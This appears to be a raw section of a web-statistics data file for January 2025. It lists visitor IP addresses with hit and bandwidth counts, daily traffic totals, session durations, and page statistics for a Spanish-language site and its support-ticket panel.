43.153.104.196 1 1 1576 20250101233104
156.146.60.15 4 4 12158 20250113000318
66.249.83.114 1 2 3662 20250103173929
172.241.146.65 4 4 10996 20250120055654
172.105.128.13 1 1 809 20250128130313
104.168.133.95 2 2 5498 20250124162627
156.146.36.74 1 5 42396 20250111150856
189.203.145.107 1 15 2281920 20250121162903
14.215.163.132 5 5 21320 20250127155447
159.89.43.152 1 1 4264 20250102031839
43.159.139.164 1 1 4264 20250101215721
45.156.129.52 1 1 809 20250130164612
45.79.181.104 1 1 809 20250104173518
77.221.155.216 2 2 23748 20250129183729
162.243.1.71 1 1 809 20250107002831
192.42.116.209 3 3 40127 20250113125452
165.154.163.199 3 3 2427 20250127232314
193.233.83.25 2 2 5498 20250125223849
124.156.157.91 1 1 2857 20250101233657
23.106.27.239 2 2 4264 20250113073821
15.235.189.146 1 1 1737 20250116050941
43.225.189.77 2 2 5498 20250115163841
84.239.43.179 1 1 4264 20250101144659
101.91.148.219 2 2 8528 20250131070343
170.106.148.137 1 1 4264 20250122171833
156.228.109.98 2 2 5498 20250112034443
64.120.34.47 4 4 10996 20250131105404
199.115.195.89 1 1 2749 20250129061121
23.106.201.70 2 2 5498 20250105155125
23.105.147.247 2 2 5498 20250106093257
43.157.201.184 2 2 8528 20250128183202
156.253.173.235 2 2 5498 20250108193235
23.80.153.96 2 2 5498 20250109063507
43.153.19.83 2 2 8528 20250117032937
191.156.155.60 0 2 342363 
70.39.90.124 1 1 809 20250127181633
94.154.127.250 2 2 5498 20250110002354
193.93.192.214 2 2 5498 20250130234348
23.105.151.201 2 2 5498 20250101181248
85.193.65.155 3 3 40786 20250123181958
182.44.2.148 3 3 12792 20250113234346
134.209.179.154 2 2 1618 20250121082408
107.174.141.105 2 2 5498 20250104211043
44.220.185.25 1 1 809 20250107220112
23.80.166.244 2 2 5498 20250105204340
172.245.113.128 2 2 5498 20250102003604
104.168.134.181 2 2 5498 20250111184435
98.80.4.112 1 1 809 20250123002607
87.236.176.49 1 1 809 20250103162535
43.159.63.75 1 1 4264 20250106191812
156.228.119.1 2 2 5498 20250119222139
134.209.183.125 2 2 1618 20250124025027
40.69.152.34 1 15 2281920 20250117144815
165.232.93.194 2 2 1618 20250116200348
35.171.144.152 3 3 11748 20250119025539
104.248.30.90 1 1 4264 20250109053459
196.244.192.46 1 1 2749 20250130211657
139.59.126.134 2 2 1618 20250119152303
64.227.73.78 1 1 809 20250102145011
62.210.90.177 1 1 809 20250111175248
198.23.250.5 2 2 5498 20250103131114
180.149.125.171 1 1 809 20250115062551
185.247.137.191 1 1 809 20250112161606
23.80.151.158 2 2 5498 20250129134816
23.82.105.232 6 6 16494 20250127043400
198.240.90.42 2 2 5498 20250105182817
162.142.125.119 1 1 809 20250128105219
195.181.168.168 1 2 4581 20250118150027
188.166.173.115 1 1 4264 20250123060233
104.168.135.32 2 2 5498 20250125022750
23.106.30.218 2 2 5498 20250124092450
45.156.129.134 1 1 809 20250124111855
35.233.67.221 1 1 4264 20250103112611
209.38.239.251 1 1 4264 20250122222800
23.82.44.82 2 2 5498 20250114145600
64.227.52.235 6 6 4854 20250109084450
223.15.245.170 1 1 4264 20250125204909
43.159.152.184 1 1 4264 20250112113504
206.168.34.49 1 1 809 20250118201603
172.245.113.243 2 2 5498 20250114185524
193.233.142.191 2 2 5498 20250122023206
156.249.138.197 2 2 5498 20250130224004
43.153.87.54 3 3 12792 20250117201644
199.45.154.117 1 1 809 20250110054546
64.120.34.105 4 4 10996 20250125065826
3.145.107.127 2 2 0 20250102092359
104.248.195.99 2 2 1618 20250113205832
186.31.13.232 1 15 2281920 20250111061243
35.93.197.8 1 1 4264 20250130060204
45.79.181.251 1 1 809 20250124212010
199.45.154.142 1 1 809 20250122045619
23.80.138.19 2 2 5498 20250111164956
87.236.176.159 1 1 809 20250119215743
206.168.34.73 1 1 809 20250117061307
199.45.154.141 1 1 809 20250111202433
54.145.18.79 1 1 0 20250113152937
51.159.101.214 2 2 1618 20250119085240
87.236.176.200 1 1 4264 20250126155930
58.49.233.126 4 4 17056 20250130011839
45.156.128.109 5 5 4045 20250125140527
23.106.30.244 2 2 5498 20250110052832
172.241.242.194 2 2 5498 20250103154718
104.168.135.247 4 4 10996 20250119234751
23.82.105.173 2 2 5498 20250112065147
23.81.70.234 2 2 5498 20250106224712
23.105.145.227 2 2 5498 20250103080506
172.245.241.123 2 2 1618 20250104192344
45.156.130.6 1 1 809 20250127165600
18.220.246.73 2 2 0 20250113084409
23.106.201.140 2 2 5498 20250102175806
185.7.214.130 6 6 81572 20250131095432
192.36.109.73 1 1 4264 20250119102543
182.44.67.97 2 2 8528 20250115215748
87.236.176.143 1 1 809 20250126145513
190.121.150.149 2 17 8841072 20250102054649
106.227.49.113 3 3 12792 20250123104054
23.110.166.245 2 2 5498 20250115151335
3.145.118.92 3 3 0 20250125021607
23.80.153.40 2 2 5498 20250109223856
44.220.188.68 1 1 809 20250103180259
49.51.195.195 1 1 4264 20250103033621
173.239.196.200 1 1 2749 20250131021159
164.90.192.139 2 2 1618 20250105171135
43.130.15.147 1 1 4264 20250125022453
167.94.145.99 1 1 809 20250104201220
23.82.81.218 2 2 5498 20250107073546
43.152.72.244 1 1 4264 20250113115235
123.201.2.123 2 2 1618 20250127193511
173.239.196.116 1 1 2749 20250102213432
221.229.106.25 1 1 4264 20250129204024
43.128.110.17 1 1 4264 20250107030852
23.80.151.60 4 4 10996 20250131024043
5.183.253.208 2 2 5498 20250120130910
23.105.147.24 2 2 5498 20250104051905
18.191.32.67 2 2 1618 20250104065024
46.191.189.9 1 1 17038 20250119131749
23.82.105.229 2 2 5498 20250117020558
64.62.197.2 1 1 809 20250122205457
185.180.140.5 2 2 1618 20250122024031
139.99.35.33 1 1 1737 20250116220143
18.221.169.188 2 2 1618 20250111115153
195.160.192.41 2 2 5498 20250106175758
66.249.79.166 0 1 6824 
154.213.187.77 1 1 809 20250116103831
45.130.203.10 1 1 2749 20250127194211
44.202.213.17 1 1 4264 20250126063907
8.219.108.167 1 1 809 20250122073356
62.210.90.176 2 2 1618 20250104125019
23.81.152.16 2 2 5498 20250124090958
49.51.253.26 1 1 4264 20250131084326
107.175.196.110 1 1 2749 20250101105415
93.115.7.93 2 2 5498 20250116173751
107.174.239.156 2 2 5498 20250124185843
3.72.50.68 2 2 0 20250116035125
209.38.219.118 1 1 4264 20250111061521
138.197.164.3 1 1 4264 20250107060944
182.44.12.37 2 2 8528 20250119235559
170.64.173.128 1 1 809 20250110151825
66.249.83.129 3 6 12892 20250103124749
185.247.137.91 1 1 4264 20250106000811
165.22.118.76 1 1 4264 20250127063030
84.17.41.78 2 2 5498 20250121044211
23.105.5.52 1 1 2749 20250103161156
179.43.191.19 1 1 4264 20250107082145
45.156.131.14 2 2 5073 20250128200745
43.204.147.126 1 1 0 20250105134138
146.70.255.105 1 1 2749 20250107015002
170.106.72.178 2 2 8528 20250109191911
23.106.207.228 2 2 5498 20250103071001
173.239.196.190 1 1 2749 20250119143049
182.42.105.144 1 1 4264 20250107154045
23.106.201.44 2 2 5498 20250107055326
178.62.216.207 1 1 809 20250126191357
118.26.39.231 2 4 3236 20250108033210
23.82.44.134 4 4 10996 20250122022119
162.142.125.114 2 2 1618 20250124174119
104.168.140.114 2 2 5498 20250118230916
13.93.230.216 1 15 2281920 20250117151531
181.56.156.238 3 17 2290448 20250107170916
5.135.58.196 1 1 1737 20250105083411
43.134.170.46 1 1 4264 20250103194301
23.105.1.201 2 2 5498 20250109080455
38.170.245.89 2 2 5498 20250123211434
43.163.6.35 2 2 8528 20250124162303
45.79.13.34 1 1 809 20250109163415
45.156.130.8 1 1 809 20250109080654
42.83.147.54 2 2 8528 20250112223323
162.142.125.116 1 1 809 20250122022015
37.27.25.110 0 1 19165 
162.142.125.39 2 2 1618 20250122060701
45.156.128.108 3 3 2427 20250125140406
203.33.203.148 2 2 8528 20250128154505
170.106.192.208 1 1 4264 20250114160211
191.156.227.120 4 15 1459785 20250114202358
185.247.137.230 1 1 4264 20250120200415
167.94.146.49 1 1 809 20250131171038
104.168.171.51 2 2 5498 20250105081917
23.108.254.220 2 2 5498 20250106130615
149.56.150.71 1 15 2281920 20250110213622
37.60.255.55 1 2 4581 20250126152733
54.88.179.33 1 1 3916 20250108104505
185.226.197.44 1 1 809 20250117004537
172.241.146.253 2 2 5498 20250117061644
3.101.154.57 2 4 9162 20250121183732
23.81.60.7 4 4 10996 20250125061106
43.156.204.134 1 1 4264 20250123211818
118.193.45.235 1 2 1618 20250128052743
38.154.214.78 0 1 1135989 
170.106.113.235 2 2 8528 20250121230526
18.97.5.111 1 1 809 20250102040447
45.58.159.99 2 2 1618 20250125214031
172.241.242.185 2 2 5498 20250105173734
194.87.114.111 2 2 5498 20250115001227
185.220.101.156 1 1 11874 20250114015834
49.51.52.250 1 1 4264 20250130070833
44.220.188.87 1 1 809 20250116175853
45.156.128.51 1 1 4264 20250111141342
190.26.133.22 1 15 2281920 20250107124019
43.128.100.220 1 1 4264 20250121061256
45.95.243.145 1 1 2749 20250103141941
192.155.90.220 1 1 809 20250122153509
23.80.153.127 2 2 5498 20250112160442
23.106.196.193 1 1 2749 20250103161211
2.58.56.233 1 1 17038 20250114015835
156.253.166.173 2 2 5498 20250123201032
87.236.176.207 1 1 809 20250104195812
104.168.135.251 2 2 5498 20250117101847
88.172.135.117 6 6 3882 20250125070747
3.22.225.7 1 1 809 20250125230638
165.154.162.212 1 2 1618 20250120094204
188.126.94.216 3 3 40786 20250110030006
34.217.106.96 2 2 8528 20250126062546
104.207.45.61 2 2 5498 20250130135118
23.82.44.80 2 2 5498 20250109161322
185.247.137.65 1 1 809 20250129123801
45.156.128.107 6 6 4854 20250125140605
185.147.125.18 6 6 81572 20250129111706
217.160.202.182 1 1 4264 20250101222426
134.209.126.82 1 1 809 20250131123726
181.59.3.102 0 1 1135989 
124.156.179.141 1 1 4264 20250130200047
23.105.1.219 2 2 5498 20250119003056
92.118.39.214 2 2 1618 20250130161852
38.154.90.112 2 2 5498 20250127002321
121.229.185.160 1 1 4264 20250111150834
64.120.33.35 2 2 5498 20250130132329
23.106.30.180 4 4 10996 20250125072614
94.247.172.129 3 3 12792 20250126004446
63.176.97.96 1 1 0 20250114153724
190.27.181.75 2 30 4563840 20250121131600
149.202.65.95 3 15 127188 20250129132400
172.226.13.235 1 15 2281920 20250129084841
206.168.34.75 1 1 809 20250129193426
167.94.138.126 1 1 809 20250105023310
23.82.105.23 2 2 5498 20250113221051
141.98.10.33 3 3 12792 20250121031412
117.62.235.53 4 4 17056 20250129154631
191.102.157.204 0 1 174948 
23.105.6.114 2 2 5498 20250130185856
87.236.176.41 1 1 809 20250126062159
93.158.91.242 1 1 4264 20250125151135
8.242.121.185 1 6 625862 20250128161312
43.130.12.43 1 1 4264 20250101221733
209.14.113.89 2 16 2286184 20250107112226
146.190.134.103 2 2 1618 20250128182237
43.155.183.138 1 1 4264 20250113200331
104.168.135.237 2 2 5498 20250123024735
172.241.243.248 2 2 5498 20250115184532
170.247.0.163 1 15 2281920 20250110175936
64.31.20.8 2 2 5498 20250126084817
43.135.134.127 1 1 4264 20250122084129
174.64.199.82 3 3 35622 20250109042730
186.121.194.127 1 1 4264 20250128101820
222.79.104.23 2 2 8528 20250115070112
49.51.39.209 1 1 4264 20250125123625
170.64.221.161 2 2 1618 20250122065856
114.96.103.33 1 1 4264 20250109154710
172.81.133.244 2 2 34076 20250126143426
23.82.80.51 2 2 5498 20250113141919
139.59.87.70 1 1 4264 20250129225911
159.223.215.187 1 1 4264 20250105055545
120.71.59.24 6 6 25584 20250131220730
23.105.1.216 2 2 5498 20250121173915
182.44.8.254 6 6 25584 20250124010146
162.142.125.42 1 1 809 20250106164125
23.80.151.115 4 4 10996 20250121183341
185.132.187.39 1 1 2749 20250119134658
104.254.92.189 2 2 5498 20250105081921
84.17.41.80 2 2 5498 20250128171704
188.166.114.24 1 1 4264 20250125180426
47.245.84.156 1 1 809 20250130013646
66.249.79.2 0 1 181337 
209.127.105.239 0 1 260790 
149.40.50.215 2 2 5498 20250116155205
104.168.133.144 2 2 5498 20250103002434
45.156.129.133 1 1 809 20250125203240
185.226.197.58 1 1 4264 20250116210546
64.227.183.76 1 1 4264 20250131074221
64.120.33.24 2 2 5498 20250111235923
51.44.7.235 1 1 4264 20250107213149
217.114.43.197 1 5 42396 20250107092202
43.159.152.4 1 1 4876 20250101205509
41.117.128.67 2 2 5498 20250123143736
147.45.51.37 2 2 5498 20250108221001
68.183.8.234 1 1 809 20250114151224
152.32.139.190 3 3 2427 20250120000715
23.82.40.158 4 4 10996 20250131042705
172.241.146.173 4 4 10996 20250122045420
43.159.148.221 1 1 4264 20250109031352
185.242.226.25 2 2 1618 20250130224128
192.3.53.240 2 2 5498 20250122205504
3.71.165.138 1 1 4264 20250118001727
164.90.199.160 1 1 4264 20250115212014
186.84.88.207 1 10 4649342 20250123161005
193.36.224.163 1 1 2749 20250114025312
209.127.108.216 0 3 293896 
172.241.238.148 2 2 5498 20250123001454
84.17.41.86 2 2 5498 20250127175330
125.94.144.102 2 2 8528 20250131020539
181.115.133.11 2 16 2286184 20250125094856
104.168.143.175 2 2 5498 20250114180516
199.115.195.52 1 1 2749 20250129061109
79.127.148.147 2 2 5498 20250120181533
213.108.1.63 2 2 5498 20250126150444
166.88.127.244 1 1 2749 20250103121108
46.101.77.212 1 1 4264 20250120101550
170.106.72.93 1 1 4264 20250116030249
206.168.34.115 1 1 809 20250127035349
23.81.152.146 2 2 5498 20250120185226
64.62.197.29 1 1 809 20250104175236
143.244.165.148 1 1 809 20250122090205
101.36.117.15 3 3 2427 20250106151716
191.96.95.215 1 1 2749 20250102174149
87.236.176.64 1 1 809 20250123073407
170.106.140.110 1 1 4264 20250102032827
23.82.44.19 2 2 5498 20250113185919
87.249.132.187 3 3 40786 20250125112144
23.81.152.200 2 2 5498 20250104023957
172.245.68.143 2 2 5498 20250113142400
23.82.44.148 2 2 5498 20250127121131
77.111.122.125 2 2 5498 20250120111201
113.62.169.130 3 3 12792 20250128012629
198.211.109.100 1 1 809 20250104194112
23.106.207.100 2 2 5498 20250104144340
147.182.134.239 6 6 4854 20250109163415
101.33.66.34 2 2 8528 20250129185040
23.105.5.147 2 2 5498 20250131041115
49.51.204.74 1 1 4264 20250123022052
185.132.187.25 1 1 2749 20250119134645
170.106.73.216 1 1 4264 20250125230928
87.236.176.213 1 1 809 20250129115330
199.45.154.150 1 1 809 20250131063005
167.94.145.109 2 2 1618 20250116091822
23.82.109.57 2 2 5498 20250111035513
190.145.85.197 2 16 2286184 20250114125953
200.33.28.232 1 15 2281920 20250124084039
206.168.34.68 1 1 809 20250106211528
23.81.152.101 3 3 8247 20250125025113
162.243.44.35 1 1 809 20250111072553
87.236.176.231 1 1 809 20250107183752
23.82.81.192 2 2 5498 20250105100258
207.180.240.208 1 1 4264 20250101221744
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20250101 58 71 2669812 45
20250102 48 69 9176104 33
20250103 121 430 61375020 48
20250104 48 93 18025951 32
20250105 43 58 6989706 28
20250106 54 72 2483673 33
20250107 71 147 11669214 47
20250108 106 135 3977452 40
20250109 61 61 164660 34
20250110 90 193 10233710 34
20250111 60 79 2661224 34
20250112 52 83 9978372 34
20250113 76 86 746812 41
20250114 58 104 24232636 33
20250115 53 81 4723253 38
20250116 68 97 4903704 36
20250117 80 152 16550495 36
20250118 51 84 4831579 32
20250119 52 76 3656937 40
20250120 52 73 10391088 32
20250121 44 116 11521687 31
20250122 93 179 3269598 39
20250123 516 630 13952073 49
20250124 87 102 2703350 38
20250125 76 91 2458413 40
20250126 55 100 7061142 41
20250127 106 149 11771278 40
20250128 63 152 37153716 38
20250129 48 122 11642218 33
20250130 54 55 165047 33
20250131 55 148 14280123 39
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
15mn-30mn 17
1h+ 1
2mn-5mn 10
30s-2mn 20
5mn-15mn 12
0s-30s 1085
30mn-1h 6
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 183
/contactenos.php 770 2796179 366 400
/ 504 2591424 463 408
/suspencion.php 384 315694 269 269
/pqr/upload/scp/tickets.php 295 1953532 11 4
/pqr/upload/scp/autocron.php 87 3654 0 7
/pqr/upload/scp/logo.php 29 269206 18 5
/index.php 27 230094 8 9
/residenciales.php 27 121977 5 11
/pqr/upload/scp/ajax.php/list/3/items/33/preview 23 3105 0 1
/pqr/upload/scp/ajax.php/users/lookup/form 17 33548 0 1
/pqr/upload/ 12 29244 3 1
/pqr/upload/scp/ajax.php/users/local 12 617 0 0
/pqr/upload/scp/ajax.php/form/help-topic/12 11 63668 0 0
/corporativo.php 11 63155 1 3
/caracteristicas.php 11 77815 1 5
/pqr/upload/scp/ajax.php/list/3/items/43/preview 10 1320 0 3
/pqr/upload/scp/ajax.php/content/signature/none 10 0 0 0
/pqr/upload/scp/index.php 10 38774 1 0
/pqr/upload/assets/font/fontawesome-webfont.woff 8 348576 0 5
/informacion_crc.php 8 33930 3 4
/factores.php 7 51875 0 1
/medidor.php 7 43765 1 4
/pqr/upload/scp/ajax.php/draft/ticket.staff 7 252 0 0
/pqr/upload/scp/ajax.php/list/3/items/27/preview 6 738 0 0
/pqr/upload/scp/ajax.php/lock/1039/ticket/1166/renew 6 252 0 0
/pqr/upload/scp/ajax.php/tickets/1135/user 1 2437 0 0
/pqr/upload/scp/ajax.php/tickets/1111/user 1 2470 0 0
/pqr/upload/scp/ajax.php/tickets/1100/user 1 2454 0 0
/pqr/upload/scp/ajax.php/draft/331 1 22 0 0
/pqr/upload/scp/ajax.php/tickets/1143/user 1 2489 0 0
/pqr/upload/scp/ajax.php/tickets/1051/user 1 2461 0 0
/pqr/upload/scp/ajax.php/tickets/1080/user 1 2459 0 0
/pqr/upload/scp/ajax.php/tickets/1081/user 2 4928 0 0
/pqr/upload/scp/ajax.php/users/select/750 1 2405 0 0
/pqr/upload/scp/ajax.php/tickets/1087/user 1 2448 0 0
/pqr/upload/scp/ajax.php/tickets/1123/preview 2 1524 0 0
/pqr/upload/scp/ajax.php/tickets/1066/user 1 2450 0 0
/pqr/upload/scp/ajax.php/tickets/1129/user 1 2449 0 0
/pqr/upload/scp/ajax.php/tickets/1114/user 1 2485 0 0
/pqr/upload/scp/ajax.php/tickets/1150/user 2 4920 0 0
/pqr/upload/scp/ajax.php/tickets/1121/user 1 2480 0 0
/pqr/upload/scp/ajax.php/tickets/1048/user 1 2444 0 0
/pqr/upload/scp/ajax.php/tickets/1136/user 1 2475 0 0
/pqr/upload/scp/ajax.php/tickets/1085/user 1 2453 0 0
/pqr/upload/scp/ajax.php/tickets/1077/preview 1 750 0 0
/pqr/upload/scp/ajax.php/tickets/1094/user 1 2469 0 0
/pqr/upload/view.php 1 5444 0 0
/pqr/upload/scp/ajax.php/tickets/1068/user 3 7352 0 0
/pqr/upload/scp/ajax.php/tickets/1093/preview 2 1464 0 0
/pqr/upload/scp/ajax.php/tickets/1096/user 1 2466 0 0
/pqr/upload/scp/ajax.php/tickets/1079/user 1 2473 0 0
/pqr/upload/scp/ajax.php/tickets/1088/user 1 2452 0 0
/pqr/upload/scp/ajax.php/tickets/1050/preview 1 767 0 0
/pqr/upload/scp/ajax.php/tickets/1049/user 1 2465 0 0
/pqr/upload/scp/ajax.php/tickets/1164/preview 1 766 0 0
/pqr/upload/scp/ajax.php/tickets/1131/user 1 2486 0 0
/pqr/upload/scp/ajax.php/tickets/1113/user 1 2495 0 0
/pqr/upload/scp/ajax.php/tickets/1158/user 1 2474 0 1
/pqr/upload/scp/dashboard.php 3 6799 0 0
/pqr/upload/scp/ajax.php/tickets/1065/user 1 2464 0 0
/pqr/upload/scp/ajax.php/tickets/1054/user 1 2459 0 0
/pqr/upload/scp/ajax.php/tickets/1060/user 1 2460 0 0
/pqr/upload/scp/ajax.php/tickets/1155/user 1 2548 0 0
/pqr/upload/scp/ajax.php/tickets/1154/user 1 2453 0 0
/pqr/upload/scp/ajax.php/tickets/1104/user 1 2452 0 0
/pqr/upload/scp/ajax.php/tickets/1109/user 1 2472 0 0
/pqr/upload/logo.php 5 96145 0 1
/pqr/upload/scp/ajax.php/tickets/1069/user 1 2495 0 0
/pqr/upload/scp/ajax.php/tickets/1125/user 1 2439 0 0
/pqr/upload/scp/ajax.php/tickets/1139/user 2 4926 0 0
/pqr/upload/scp/ajax.php/tickets/1074/user 1 2484 0 0
/pqr/upload/scp/ajax.php/list/3/items/44/preview 4 520 0 0
/pqr/upload/scp/ajax.php/tickets/1133/user 1 2463 0 0
/pqr/upload/scp/ajax.php/tickets/1127/user 1 2468 0 0
/pqr/upload/scp/ajax.php/tickets/1119/user 1 2461 0 0
/pqr/upload/scp/ajax.php/tickets/1148/user 1 2465 0 0
/pqr/upload/scp/ajax.php/tickets/1052/user 1 2465 0 0
/pqr/upload/scp/ajax.php/tickets/1152/user 1 2449 0 0
/pqr/upload/scp/users.php 2 8274 0 0
/pqr/upload/scp/ 1 3751 0 0
/pqr/upload/index.php 1 5023 0 0
/pqr/upload/scp/ajax.php/users/select/832 1 2386 0 0
/pqr/upload/scp/ajax.php/tickets/1076/user 1 2452 0 0
/pqr/upload/scp/ajax.php/tickets/1134/user 1 2454 0 0
/pqr/upload/scp/ajax.php/lock/ticket/1060 1 42 0 0
/pqr/upload/scp/ajax.php/lock/ticket/1166 3 126 0 0
/pqr/upload/scp/ajax.php/tickets/1136/preview 1 768 0 0
/pqr/upload/account.php 1 41624 0 1
/pqr/upload/scp/ajax.php/tickets/1078/user 1 2471 0 0
/pqr/upload/scp/ajax.php/tickets/1061/user 1 2457 0 0
/pqr/upload/scp/ajax.php/tickets/1117/preview 2 1556 0 0
/pqr/upload/ajax.php/i18n/es_MX/js 5 13995 0 0
/pqr/upload/scp/ajax.php/tickets/1062/user 1 2477 0 0
/pqr/upload/scp/ajax.php/tickets/1058/user 1 2501 0 0
/pqr/upload/scp/ajax.php/tickets/1115/thread/2302/edit 1 538 0 0
/pqr/upload/scp/ajax.php/tickets/1098/user 1 2472 0 0
/pqr/upload/scp/ajax.php/tickets/1145/user 1 2466 0 0
/pqr/upload/scp/ajax.php/tickets/1144/user 1 2486 0 0
/pqr/upload/scp/ajax.php/tickets/1097/user 1 2483 0 0
/pqr/upload/open.php 1 12466 0 0
/pqr/upload/scp/ajax.php/list/3/items/35/preview 1 126 0 0
/pqr/upload/scp/ajax.php/tickets/1073/user 1 2468 0 0
/pqr/upload/scp/tasks.php 2 6361 0 1
/pqr/upload/scp/ajax.php/tickets/1140/user 1 2463 0 0
/pqr/upload/scp/ajax.php/tickets/1107/user 1 2499 0 0
/pqr/upload/scp/ajax.php/tickets/1112/preview 1 767 0 0
/pqr/upload/scp/ajax.php/tickets/1099/user 1 2488 0 0
/pqr/upload/scp/ajax.php/tickets/1053/user 1 2458 0 0
/pqr/upload/scp/ajax.php/tickets/1138/preview 1 758 0 0
/pqr/upload/scp/ajax.php/tickets/1117/user 1 2494 0 0
/pqr/upload/scp/ajax.php/tickets/1146/user 1 2472 0 0
/pqr/upload/scp/ajax.php/tickets/1050/user 1 2474 0 0
/pqr/upload/scp/ajax.php/tickets/1124/user 1 2466 0 0
/pqr/upload/scp/ajax.php/tickets/1151/user 1 2484 0 0
/pqr/upload/scp/ajax.php/tickets/1156/user 1 2461 0 0
/pqr/upload/scp/ajax.php/tickets/1112/user 1 2470 0 0
/pqr/upload/scp/ajax.php/tickets/1083/user 1 2459 0 0
/pqr/upload/scp/ajax.php/tickets/1118/user 1 2489 0 0
/pqr/upload/scp/ajax.php/tickets/lookup 4 2387 0 0
/pqr/upload/scp/ajax.php/tickets/1055/user 1 2456 0 0
/pqr/upload/scp/ajax.php/tickets/1110/user 1 2467 0 0
/pqr/upload/scp/ajax.php/tickets/1102/user 1 2462 0 0
/pqr/upload/scp/ajax.php/tickets/1084/user 1 2464 0 0
/pqr/upload/scp/ajax.php/tickets/1149/user 1 2502 0 0
/pqr/upload/scp/ajax.php/lock/1036/release 1 21 0 0
/pqr/upload/scp/ajax.php/tasks/add 1 2435 0 0
/pqr/upload/scp/ajax.php/tickets/1147/user 1 2467 0 0
/pqr/upload/scp/ajax.php/tickets/1166/preview 1 746 0 0
/pqr/upload/scp/ajax.php/tickets/1153/user 1 2495 0 0
/pqr/upload/scp/ajax.php/tickets/1089/user 1 2472 0 0
/pqr/upload/scp/ajax.php/tickets/1115/user 1 2490 0 0
/pqr/upload/scp/ajax.php/tickets/1064/user 1 2444 0 0
/pqr/upload/scp/ajax.php/draft/ticket.response.1166 1 36 0 0
/pqr/upload/scp/ajax.php/tickets/1123/user 1 2451 0 0
/pqr/upload/scp/ajax.php/tickets/1116/user 1 2456 0 0
/pqr/upload/scp/ajax.php/tickets/1059/user 1 2452 0 0
/pqr/upload/scp/ajax.php/tickets/1108/user 1 2477 0 0
/pqr/upload/scp/ajax.php/tickets/1077/user 1 2454 0 0
/pqr/upload/scp/ajax.php/lock/ticket/1164 1 42 0 0
/pqr/upload/scp/ajax.php/tickets/1056/user 1 2491 0 0
/pqr/upload/scp/ajax.php/tickets/1072/user 1 2447 0 0
/pqr/upload/scp/ajax.php/help/tips/dashboard.dashboard 1 3238 0 0
/pqr/upload/scp/kb.php 3 5055 0 0
/pqr/upload/scp/ajax.php/tickets/1101/user 1 2470 0 0
/pqr/upload/scp/ajax.php/tickets/1130/user 1 2458 0 0
/pqr/upload/scp/ajax.php/tickets/1120/user 1 2455 0 0
/pqr/upload/scp/ajax.php/tickets/1105/user 1 2475 0 0
/pqr/upload/scp/ajax.php/tickets/1075/user 1 2461 0 0
/pqr/upload/scp/ajax.php/tickets/1106/user 1 2470 0 0
/pqr/upload/scp/ajax.php/tickets/1137/user 1 2450 0 0
/pqr/upload/scp/ajax.php/tickets/1070/user 1 2470 0 0
/pqr/upload/scp/ajax.php/tickets/1139/preview 2 1496 0 0
/pqr/upload/scp/ajax.php/tickets/1067/user 1 2481 0 1
/pqr/upload/scp/ajax.php/lock/ticket/1165 2 84 0 0
/pqr/upload/scp/ajax.php/tickets/1132/user 1 2427 0 0
/pqr/upload/scp/ajax.php/draft/ticket.staff.response 3 108 0 0
/pqr/upload/scp/ajax.php/tickets/1093/user 2 4918 0 0
/pqr/upload/scp/ajax.php/help/tips/tickets.queue 1 1465 0 0
/pqr/upload/scp/ajax.php/tickets/1126/user 1 2471 0 0
/pqr/upload/scp/ajax.php/tickets/1103/user 1 2469 0 0
/pqr/upload/scp/ajax.php/tickets/1063/user 1 2469 0 0
/pqr/upload/scp/ajax.php/tickets/1095/user 1 2549 0 0
/pqr/upload/scp/ajax.php/tickets/1140/preview 1 768 0 0
/pqr/upload/scp/ajax.php/tickets/1057/user 1 2443 0 0
/pqr/upload/scp/ajax.php/tickets/1090/user 1 2481 0 1
/pqr/upload/scp/ajax.php/tickets/1046/preview 1 758 0 0
/pqr/upload/scp/ajax.php/tickets/1138/user 1 2467 0 0
/pqr/upload/scp/ajax.php/tickets/1141/user 1 2486 0 0
/pqr/upload/scp/ajax.php/tickets/1166/forms/manage 1 1117 0 1
/pqr/upload/scp/ajax.php/list/3/items/41/preview 1 114 0 0
/pqr/upload/scp/ajax.php/tickets/1092/user 1 2472 0 0
/pqr/upload/scp/ajax.php/lock/1034/release 1 21 0 0
/pqr/upload/scp/ajax.php/tickets/1142/user 1 2446 0 0
/pqr/upload/scp/ajax.php/tickets/1122/user 1 2461 0 0
/pqr/upload/scp/ajax.php/tickets/1091/user 1 2501 0 0
/pqr/upload/scp/ajax.php/tickets/1082/user 2 4916 0 0
/pqr/upload/scp/ajax.php/tickets/1128/user 1 2478 0 0
/pqr/upload/scp/ajax.php/tickets/1071/user 1 2450 0 0
/pqr/upload/scp/ajax.php/tickets/1086/user 1 2464 0 0
/procedimientos.php 4 46150 1 1
/pqr/upload/scp/ajax.php/tickets/1157/user 1 2483 0 0
/control.php 4 38794 0 2
/pqr/upload/scp/ajax.php/tickets/1160/preview 1 770 0 0
END_SIDER
